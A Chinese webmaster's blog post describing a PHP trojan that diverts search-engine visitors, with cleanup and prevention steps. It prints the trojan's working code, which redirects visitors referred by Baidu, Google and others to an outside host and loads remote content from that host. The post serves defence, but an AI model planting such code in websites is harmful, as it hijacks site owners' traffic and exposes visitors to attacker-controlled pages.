導致搜尋引擎流量轉移 php木馬介紹及防範

仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷 淘寶客 雲主機 技術大廳

如果你的網站平時流量很大，PV很高，某一天PV卻開始變少，除開反思網站內容，還要考慮下網站是否中木馬，其實很早以前便有導致搜尋引擎流量轉移的php木馬，簡單來說便是如果訪問流量來自搜尋引擎，那麼自動獲得對方網站的檔， 從而讓你的網站不被使用者看到。

因為我的網站近期遭受到這樣的攻擊，所以正好分享下這段代碼，希望對於廣大站長有所啟示，特別是對於用php程式建站的站長，還是應該防範下這類攻擊。 按照歷史的情況來看，這樣的木馬不少見，似乎一年前甚至幾年前便有，只是可能現在取得的效果沒過去那麼好。

下面是導致搜尋引擎來路流量轉移的攻擊代碼：

error_reporting(E_ERROR);

header('content-Type: text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer = Split("#",$come_from) ;

foreach($referer as $v){

if(stristr($_SERVER['HTTP_REFERER'],$v))

{

Header("Location: ".' HTTP://www.abc.com/3/nb.html?'. $_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('HTTP://www.abc.com//xx/dn2.php');

?>

代碼很簡單，如果訪問來源是搜尋引擎，那麼會定位到下面所述的php檔及html檔，這樣使用者便沒法獲得預想的東西。 當然，現在每個伺服器的按照設置不一樣，部分伺服器即便是被上傳此類檔，還是限制執行的;不過，既然遇到問題，那麼接下來便是要解決問題。

下面簡單說說我的處理方法，希望對大家以後遇到類似的情況有所説明。

第一步自然是刪除類似的php的檔，這類php檔沒有固定的名字，不過都是在根目錄，所以查找起來很方便，刪除掉那些陌生的檔即可。 刪除以後不要激動，先去別的目錄查找下類似的陌生檔，看到陌生的檔後打開看看，有問題直接刪除。

第二步是繼續去看常用的系統php檔，看看這些檔是否近期被修改過，如果被修改過，那麼下載下來，隨後查找前面出現的陌生php檔案名，好比原來是出現的dv.php，現在可以搜索下dv.php，看看會不會被修改成這樣; 另外便是，一般別的目錄下還會有真正的木馬。

第三步可以去360網站安全檢測平臺看看，上傳檔驗證通過即可開始測試網站是否安全;一般而言，如果網站被掛黑鏈或者有不可見的文字，都會有提示，所以還是比較好用的。 特別是對於黑鏈檢測，這點功能比較好，因為黑鏈一般都是隱藏的，站長自己很難想到的。

第四步是修改弱口令，不管是FTP帳號密碼，還是網站後臺位址，還是網站後臺登錄名，還是別的什麼密碼，如果覺得太弱了，好比只有七八位，那麼建議修改得更難一點，不少網站被破解，都是弱口令被掃描到， 加大密碼長度對於這類破解網站的防範還是有説明的。

寫到這裡，這個故事基本上告一段落了，網站安全刻不容緩，每時每刻我們都應該注意網站的安全問題，你不注意，那些掛黑鏈的人可會惦記上你的，只有不斷提升網站的安全才可以儘量避免被黑。 本文由愛不網(HTTP://www.aibue.com)站長原創，轉載分享請注明，謝謝合作!